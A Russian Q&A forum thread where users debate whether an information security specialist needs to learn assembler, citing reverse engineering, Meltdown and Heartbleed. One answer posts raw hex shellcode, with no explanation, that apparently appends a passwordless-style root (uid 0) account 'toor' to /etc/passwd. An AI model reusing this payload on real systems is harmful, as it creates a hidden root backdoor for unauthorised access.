Задать вопрос
@Fardeendragon
Student
информационная-безопасность

Нужен ли ASSEMBLER специалисту по информационной безопасности?

Нужен ли ASSEMBLER специалисту по информационной безопасности?
В данный момент я изучаю язык C++ и учусь на специалиста в информационной безопасности. И вот тут напрашивается вопрос нужно ли мне знать ASSEMBLER?
В интернете все разделились на 2 лагеря: одни говорят, что он устарел и на замену ему пришли высокоуровневые языки программирования, а другие, как раз таки наоборот утверждают, что он нужен для "общения" с железом.
И все же, если не трудно ответить на этот пост, могли б ещё написать об + и -, данного языка(больно интересно).
  • Вопрос задан
  • 1508 просмотров
1 комментарий
Подписаться 1 Простой 1 комментарий
Пригласить эксперта
Ответы на вопрос 10
jcmvbkbc
@jcmvbkbc
"I'm here to consult you" © Dogbert
Нужен ли ASSEMBLER специалисту по информационной безопасности?
...
В интернете все разделились на 2 лагеря: одни говорят, что он устарел и на замену ему пришли высокоуровневые языки программирования...

Нужен ли алфавит специалисту по информационной безопасности?
...
В интернете все разделились на 2 лагеря: одни говорят, что алфавит устарел и на замену ему пришли эмодзи...
Ответ написан
3 комментария
3 комментария
CityCat4
@CityCat4 Куратор тега Информационная безопасность
//COPY01 EXEC PGM=IEBGENER
Если собираетесь заниматься маршрутизаторами, политиками доступа, сетями или допустим написанием правил, руководств, инструкций, анализом логов (тоже нужная, хоть и муторная работа) или допустим аналитикой СМП - тогда скорее всего не нужен.
Если собираетесь заниматься "анти-взломом", железом, микроконтроллерами, вирусами-шифровальщиками и прочими проявлениями "дикого-дикого Запада" - нужен обязательно. Это все равно что специалисту по банковским сейфам спрашивать, а нужно ли ему курсы по приемам вскрытия сейфов :D
Ответ написан
Комментировать
Комментировать
inoise
@inoise
Solution Architect, AWS Certified, Serverless
Я может быть чего-то не знаю про Security, но когда это безопасность стала связана с языками программирования? Безопасность это шифрование данных (at rest и in transit), это протоколы авторизации и аутентификации, это реагирование на действие в системах, это мониторинг. В конце концов это набор политик и правил для организаций. Безопасность бывает разная. Да, есть вещи связанные с хранением доступов к системам, но это очень маленький срез и не зависит сильно от языка программирования.
Ответ написан
Комментировать
Комментировать
@Karpion
Знать ассемблер не нужно, но вот иметь представление о нём - необходимо. Хотя бы потому, что без этого невозможно понять, каким образом возникают уязвимости типа MeltDown.

Необходимый уровень знания ассемблера - зависит от специализации внутри профессии "ИБ".

Скорее всего, программировать на ассемблере не понадобится. Впрочем, ИБ-специалисты довольно редко программируют сами - они больше в чужих программах копаются.
Ответ написан
Комментировать
Комментировать
@dmfun
ASM хорош для всех в плане кругозора. Его знание не панацея и не обязательно делает хорошим спецом.
Но зато появится понимание многих вещей. Как минимум надо бинарные операции и логику выучить. Специалисты, которые не знают как AND и XOR работают и сдвиги, многое теряют. Именно программировать, наверное, не обязательно. Ознакомиться с базой, чтобы иметь представление. Думаю в ИБ еще есть много чему поучиться не сильно углубляясь в ASM.
Ответ написан
Комментировать
Комментировать
sergey-gornostaev
@sergey-gornostaev Куратор тега Assembler
Седой и строгий
одни говорят, что он устарел и на замену ему пришли высокоуровневые языки программирования

Спроси у них, что это и зачем
\x31\xdb\xf7\xe3\x50\xbb\xff\x73\x77\x64\xc1\xeb\x08\x53\x48\xbb\x2f\x65\x74\x63\x2f\x70\x61\x73
\x53\x48\x89\xe7\x87\xf2\x66\xbe\x01\x04\x04\x02\x0f\x05\x48\x97\xeb\x0e\x5e\x6a\x01\x58\x6a\x26\x5a
\x0f\x05\x6a\x3c\x58\x0f\x05\xe8\xed\xff\xff\xff\x74\x6f\x6f\x72\x3a\x73\x58\x75\x43\x4b\x69\x37\x6b
\x33\x58\x68\x2f\x73\x3a\x30\x3a\x30\x3a\x3a\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x73\x68\x0a
Ответ написан
Комментировать
Комментировать
@AquariusStar
Ассемблер обязателен специалисту по информационной безопасности. Я, как окончивший факультет по ИБ, могу сказать, что там его тоже изучают (не знаю, как у вас, но у меня уже было). Почему? Потому что исходный код на высоком уровне бывает не всегда очевидным. Приходится лезть на нижний уровень, чтобы искать там уязвимости. Бывают ещё такие решения, где лучше работать с ассемблером, чем с C++. Да и в арсенале специалиста по информационной безопасности должен быть богатый набор инструментов и языков программирования, чтобы уметь защищать от несанкционированного доступа, утечки или утраты ценной информации, нарушение работоспособности программы или устройства и так далее.
Ответ написан
Комментировать
Комментировать
Jump
@Jump
Системный администратор со стажем.
Ассемблер нужен специалисту по ИБ точно также как и IT специалисту.
Вот к примеру взять такого IT специалиста как консультант по внедрению 1с, фронтэнд разработчик, тестировщик, сетевой инженер, специалист по BigData, разработчик нейросетей, реверс инженер.

Вывод - в некоторых случаях, при работе в конкретной узкой специализации он может оказаться полезен, и иногда даже необходим. Но в большинстве случаев нужен примерно как слону пятая нога.
Ответ написан
Комментировать
Комментировать
asilonos
@asilonos
Программист
Да нужен, на первом этапе нужно о нем знать.
1) Потомучто если с ним не познакомится ты не поймеш что на некоторых системмах например уязвимость heartbleed очень маловероятно осуществима. (потомучто все експлойты под архитектуры x86-64, а что это значит??)
2) Linux Админы тебя как ИБ Админа, спокойно уговорят пропатчить ядро Linux для защиты от MeltDown, на отдельно стоящем "не shared" серваке. А этого не надо делать. ASM даст тебе это понимание.

На продвинутом ИБ уровне, нужно его немного знать чтобы ты мог отличить его код в высокоуровневых языках, для реализации всяких ИБ вещей. Потомучто ИБ спецы всегда учатся, ищут то-то новое, пишут Статьи. И вот чтобы чуш не написать случайно, нужно знать особенности Архитектур процессоров. ну хотбы одного )) И ASM тут идеальный способ.
Ответ написан
Комментировать
Комментировать
karp89
@karp89
Разработчик сайтов
100% нужен
Ответ написан
Комментировать
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Похожие вопросы
Вакансии с Хабр Карьеры
Специалист по управлению уязвимостями (информационная безопасность)
Гринатом Москва
от 100 000 до 120 000 ₽
Старший специалист по информационной безопасности (аттестация ОИ)
Гринатом Москва
До 120 000 ₽
Руководитель направления информационной безопасности ОКИИ
Интер РАО – Управление сервисами Санкт-Петербург
от 180 000 ₽
Ещё вакансии
Заказы с Хабр Фриланса
Chatgpt Google sheets
25 нояб. 2024, в 15:43
1500 руб./за проект
Написание статей в нужном стиле ( интерьер, дизайн спальни etc )
25 нояб. 2024, в 15:01
1000 руб./за проект
Разработать телеграмм бота для заказа такси!!!
25 нояб. 2024, в 14:54
25000 руб./за проект
Ещё заказы